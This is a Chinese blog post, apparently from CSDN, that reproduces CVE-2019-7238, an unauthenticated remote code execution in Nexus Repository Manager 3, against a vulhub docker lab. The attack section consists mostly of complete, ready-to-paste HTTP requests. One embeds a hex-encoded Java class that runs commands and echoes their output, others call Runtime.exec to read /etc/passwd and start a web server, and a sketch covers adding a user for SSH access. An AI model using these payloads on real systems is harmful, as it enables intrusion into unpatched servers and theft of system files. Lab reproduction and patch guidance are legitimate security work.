Nexus Repository Manager 3 远程命令执行(CVE-2019-7238)复现

最新推荐文章于 2021-11-24 09:34:00 发布
最新推荐文章于 2021-11-24 09:34:00 发布
阅读量564 收藏 1
点赞数
文章标签: java 安全 docker linux git
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37602797/article/details/117811898
版权

Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)复现

相关实战项目中遇到,本地搭建环境测试,尝试多种利用方式。


v2-3bdaf11b36ed74d97247af21eef3a257_b.jpg


一、漏洞背景

Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。

二、环境搭建

本环境复现使用vulhub的docker环境

github.com/vulhub/vulhu

拉取docker环境


v2-9d0a6cc13b9be091b1926ddeb0e0e66f_b.jpg


环境启动


v2-8f9ae398766c1a34ce4703829578c817_b.jpg


访问IP+8081

192.168.0.102:8081/


v2-90c7a9916867a6ab4f4b414e415ac97d_b.jpg


使用账号密码admin:admin123登录后台,然后在maven-releases下随便上传一个jar包:

触发该漏洞,必须保证仓库里至少有一个包存在。所以我们需要上传一个jar包。


v2-1a0a0e33fd3d5114b9faf21495d38348_b.jpg


上传完成


v2-061338af0bac29bba1b9539830385e6d_b.jpg


三、漏洞复现

1)可以直接执行命令

执行cat /etc/passwd

POST/service/extdirectHTTP/1.1Host: 192.168.0.102:8081User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Accept: */*Content-Type: application/jsonX-Requested-With: XMLHttpRequestContent-Length: 7260Connection: close​{"action":"coreui_Component","type":"rpc","tid":8,"data": [{"sort": [{"direction":"ASC","property":"name"}],"start":0,"filter": [{"property":"repositoryName","value":"*"}, {"property":"expression","value":"function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property":"type","value":"jexl"}],"limit":50,"page":1}],"method":"previewAssets"}

可以成功执行命令


v2-4991eb8b8c3ccf000ea6933fcf533aac_b.jpg


注意payload构造上面的数据包替换IP地址其他的可以直接粘贴到burp中。

如果像执行其他的命令修改:cat /etc/passwd 处


v2-7d3d385983f4d3d13779e8542f90553b_b.jpg


详细的翻阅和查看相关是否有数据相关连接详细


v2-f5c5f1b8434f5b9afe1b1eee23d29a07_b.jpg


/nexus-data/db基本上没有可用信息

2)关于命令执行回显,很多时候攻击者可以访问目标主机,但目标主机不能反弹shell到攻击者;

可以开启一个web服务,将要执行的命令写入到网站目录下面,然后读取文件,得到命令回显内容。

python web for Nexus (python开启httpserver服务)

POST/service/extdirectHTTP/1.1Host: 192.168.0.102:8081User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Accept: */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Nexus-UI: trueNX-ANTI-CSRF-TOKEN: 00045277-54c3-47bd-831b-b056a3a8e3abContent-Type: application/jsonX-Requested-With: XMLHttpRequestReferer: 10.10.20.166:8081/Conte 428Cookie: sidebar_collapsed=false; NX-ANTI-CSRF-TOKEN=00045277-54c3-47bd-831b-b056a3a8e3ab; _ga=GA1.4.915076148.1558341613; NXSESSIONID=df711f34-689b-49dc-8e53-288352ad2329; _gid=GA1.4.813394406.1558444836; _gat=1; _gat_adw=1; _gat_cdt=1; _gat_UA-1693297-38=1X-Forwarded-For: 127.0.0.1Connection: keep-alive​{"type":"rpc","method":"previewAssets","tid":18,"data": [{"limit":50,"sort": [{"property":"name","direction":"ASC"}],"page":1,"filter": [{"value":"*","property":"repositoryName"}, {"value":"1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"setsid python -m SimpleHTTPServer 8987\")","property":"expression"}, {"value":"jexl","property":"type"}],"start":0}],"action":"coreui_Component"}

执行成功


v2-ec995a1e1557f72207738f585c51d52c_b.jpg


进入docker查看开启pythonhttpserver服务(docker需要端口转发,目前方式

只能验证方法可行)


v2-46e9933e65b5e2d164ee631b5dc37eaf_b.jpg


3)get the passwd

将/etc/passwd复制到当前目录下cp /etc/passwd ./

POST/service/extdirectHTTP/1.1Host: 192.168.0.102:8081User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Accept: */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Nexus-UI: trueNX-ANTI-CSRF-TOKEN: 00045277-54c3-47bd-831b-b056a3a8e3abContent-Type: application/jsonX-Requested-With: XMLHttpRequestReferer: 192.168.0.102:8081/Cont 407Cookie: sidebar_collapsed=false; NX-ANTI-CSRF-TOKEN=00045277-54c3-47bd-831b-b056a3a8e3ab; _ga=GA1.4.915076148.1558341613; NXSESSIONID=df711f34-689b-49dc-8e53-288352ad2329; _gid=GA1.4.813394406.1558444836; _gat=1; _gat_adw=1; _gat_cdt=1; _gat_UA-1693297-38=1X-Forwarded-For: 127.0.0.1Connection: keep-alive​{"type":"rpc","method":"previewAssets","tid":18,"data": [{"limit":50,"sort": [{"property":"name","direction":"ASC"}],"page":1,"filter": [{"value":"*","property":"repositoryName"}, {"value":"1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"cp /etc/passwd ./\")","property":"expression"}, {"value":"jexl","property":"type"}],"start":0}],"action":"coreui_Component"}

执行成功


v2-4170c916dd418454c449bfadca74c87d_b.jpg


命令执行成功


v2-135fd7249bc370005b81ba0542a4fd43_b.jpg


curl 192.168.0.102:8081/pass


访问下载或者直接访问url下载

4)command 通过脚本命令执行python版本


v2-569c6a1cafb74af7d202fc7b51e04e3e_b.jpg


java GUI版本


v2-bc93bc2e78b86754fb3b309b750e3ed5_b.jpg


5)login ssh(docker未复现)参考思路

用echo命令修改用户密码(root 权限)

useraddthelostworldechopassword | passwd --stdin thelostworld​sshusername: thelostworldsshpassword: password​sshthelostworld@192.168.0.102​Connectingto 192.168.0.102:22...Connectionestablished.Toescape to local shell, press Ctrl+Alt+].

四、漏洞修复

将Nexus Repository Manager OSS/Pro升级到3.15.0及之后的版本。

参考文献:

github.com/verctor/nexu

github.com/jas502n/CVE-

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

公众号:


v2-be16fc9802cb2dd23f77ec16f33951f8_b.jpg


thelostworld:


v2-20e48f777f98d9c420a04d5037b12820_b.jpg


​个人知乎:zhihu.com/people/fu-wei


个人简书:jianshu.com/u/bf0e38a8d

thelostworld-公众号
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-7238.py
10-25
# CVE-2019-7238 Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0 found by Rico Tencent Security Yunding Lab and [@voidfyoo](https://twitter.com/voidfyoo)
CVE-2019-7238复现
梦之序章的博客
04-13 6043
成因 Nexus Repository Manager是Sonatype公司的一个产品,简称NXRM,它是一款通用的软件包仓库管理服务,可以简单的理解为Maven的私服。 2019年2月5日Sonatype发布安全公告,在Nexus Repository Manager 3中由于存在访问控制措施的不足,未授权的用户可以利用该缺陷构造特定的请求在服务器上执行Java代码,从而达到远程代码执行的目的。...
Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238 漏洞复现
ADummy的博客
03-03 318
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238) by ADummy 0x00利用路线 ​ ysoserial生成payload—>上传给网站进行解析—>命令执行 0x01漏洞介绍 ​ SNexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将
Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞复现
EC_Carrot的博客
03-04 1528
漏洞背景 Nexus Repository Manager 3是一款软件仓库,可以用来存储和分发Maven,NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。2019年2月5日Sonatype发布安全公告,在Nexus Repository Manager 3中由于存在访问控制措施的不足,未授权的用户可以利用该缺陷构造特定的请求在服务器上执行Java代码,从而达到远程代码执行的目的
Nexus Repository Manager OSS Pro EL表达式远程代码执行
thelostworld
04-18 137
Nexus Repository Manager OSS Pro EL表达式远程代码执行CVE-2020-10199_10204(学习复现)一、漏洞描述Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。在 Nexus Repository Manage...
CVE-2019-7238CVE-2019-7238的Poc-Nexus Repository Manager 3远程执行代码
03-02
CVE-2019-7238 Rico腾讯安全云顶实验室和发现的Nexus Repository Manager 3未经身份验证的远程代码执行< 详细分析(英文): 详细分析(非英语): 安全公告:
Nexus Repository Manager 3.28.1-01
10-26
最新版本的 Nexus Repository Manager 3.28.1-01 Nexus是一个强大的Maven仓库管理器,它极大地简化了本地内部仓库的维护和外部仓库的访问。 如果使用了公共的Maven仓库服务器,可以从Maven中央仓库下载所需要的构件...
nexus-3.37.0-01-win64 - Nexus Repository Manager OSS
12-12
Nexus Repository Manager OSS 由于nexus目前官网上(https://help.sonatype.com/repomanager3/download)已经很难下载了,除非翻墙,故整理了一下目前最新版本的分享一下,有需要的欢迎下载。
nexus-repository-composer:Nexus Repository Manager的Composer支持(正在进行中!)
03-09
docker run -d -p 8081:8081 --name nexus-repository-composer nexus-repository-composer 有关如何持久存储卷的更多信息,请查看。 现在可以从浏览器访问该应用程序,为 从Nexus Repository Manager版本3.17开始...
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238
EC_Carrot的博客
07-14 272
漏洞复现 环境启动不了,稍微按照文章讲讲 3.14.0及之前版本存在该漏洞,环境启动后需要内部有至少有一个jar包存在,所以需要登陆进去,maven-releases下随便上传一个jar包 上传后,直接发送如下数据包,即可执行touch /tmp/success命令: POST /service/extdirect HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko
Nexus配置实例
10-31
Nexus 7000的配置和详细配件说明
Nexus Repository Manager 3 RCE(CVE-2019-7238)
公众号shadow sock7
02-13 3551
参考: https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019 https://mp.weixin.qq.com/s/...
vulhub-NexusCVE-2019-7238
qq_26947429的博客
07-23 364
成因 * Nexus Repository Manager是Sonatype公司的一个产品,简称NXRM,它是一款通用的软件包仓库管理服务,在Nexus Repository Manager 3中由于存在访问控制措施的不足,未授权的用户可以利用该缺陷构造特定的请求在服务器上执行Java代码,从而达到远程代码执行的目的。* 影响范围: Nexus Repository Manager OSS/Pro 3.6.2-3.14.0 首先访问这个页面,登录admin:admin123,随便传个东西 传好之后呢,用C
Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238
whatday的专栏
07-31 884
目录 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 端口设置 Vulnhub官方复现教程 https://vulhub.org/#/environments/nexus/CVE-2019-7238/ 漏洞原理 Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致
Nexus Repository Manager 3 远程命令执行漏洞环境搭建及复现(CVE-2019-7238)
qq_36369941的博客
07-17 3086
简介 Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。 影响范围 Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版...
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238)
MD@@nr丫卡uer
02-24 146
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238) 前言 Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。 影响版本 Nexus Repository Manager OSS/Pro 3.6.2版本-3.14.0版本 漏洞复现 未授
nexus repository manager 上传本地jar至阿里云maven私服
cxy_zxl的博客
11-24 2402
通过nexus repository manager 上传本地jar至阿里云maven私服前言打开nexus repository manager 前言 最近项目中要使用java解压pdf,网上找了一大堆,终于解压成功,但是因为maven依赖中没有该pom文件jar包所以需要将本地jar包上传至maven私服,开整 打开nexus repository manager 1.首先进行登录操作,默认用户名,密码为admin ,admin123 ,项目中如果用到,可以到maven的conf文件中找到相关配置,这
Sonatype Nexus Repository Manager 怎么执行docker pull
最新发布
06-08
其中,"<nexus-url>" 是 Sonatype Nexus Repository Manager 的 URL,"<repository-name>" 是您创建的 Docker 代理存储库的名称,"<image-name>" 是要拉取的 Docker 镜像名称,"<tag>" 是要拉取的 Docker 镜像标签。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值